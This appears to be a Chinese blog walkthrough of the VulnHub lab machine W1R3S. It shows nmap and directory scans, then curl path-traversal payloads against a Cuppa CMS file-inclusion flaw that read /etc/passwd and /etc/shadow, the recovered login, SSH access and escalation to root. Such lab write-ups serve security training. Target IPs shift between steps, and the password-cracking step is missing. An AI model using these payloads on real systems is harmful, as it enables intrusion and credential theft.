vulnhub靶机-w1r3s

2 篇文章 0 订阅
2 篇文章 0 订阅

w1r3s下载地址:https://www.vulnhub.com/entry/w1r3s-101,220/

下载之后导入虚拟机,选择NAT模式自动分配ip

信息收集

查看靶机ip(两种方式都可)

arp-scan -l
nmap -sn 192.168.22.0/24

靶机IP:192.168.22.128

扫描端口

nmap --min-rate 1000 -p- 192.168.80.129 

发现靶机开放端口:21,22,80,3306

使用tcp协议详细扫描端口服务

在使用udp扫一次

nmap -sU -p21,22,80,3306 192.168.47.154 

使用nmap自带的web漏洞脚本进行扫描

nmap --script=vuln -p21,22,80,3306 192.168.80.129

web渗透

打开web界面,出现apache

dirsearch -u 192.168.22.128   扫描目录(三种都可)
dirb http://192.168.22.128
gobuster dir -u 192.168.22.128 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

爆出两个可疑目录/administrator/wordpress

访问/wordpress,是wordpress框架界面

访问administrator,是一个Cuppa框架

用searchsploit命令查询Cuppa cms是否存在漏洞: searchsploit cuppa cms

发现存在一处漏洞, 漏洞详情保存在25971.txt中, 将其导出来: searchsploit cuppa cms -m 25971.txt

searchsploit cuppa cms -m 25971.txt
​
查看漏洞详情得知, 该cms可通过文件包含漏洞读取任意文件, 我们选取其中一个payload: http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd来试试
​

浏览器访问:http://192.168.47.154/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd, 没有回显, 此处用的是Get请求, 后面尝试下POST请求

还可以使用curl的方式

curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.22.128/administrator/alerts/alertConfigField.php

读取shadow文件

curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.22.128/administrator/alerts/alertConfigField.php

获得passwd和shadow文件内容,root,www-data,w1r3s引起我们注意

curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.22.128/administrator/alerts/alertConfigField.php

w1r3s/computer

ssh远程登陆得到shell

提权

获得了账号w1r3s密码,直接提权成功,获得root权限

  • 12
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值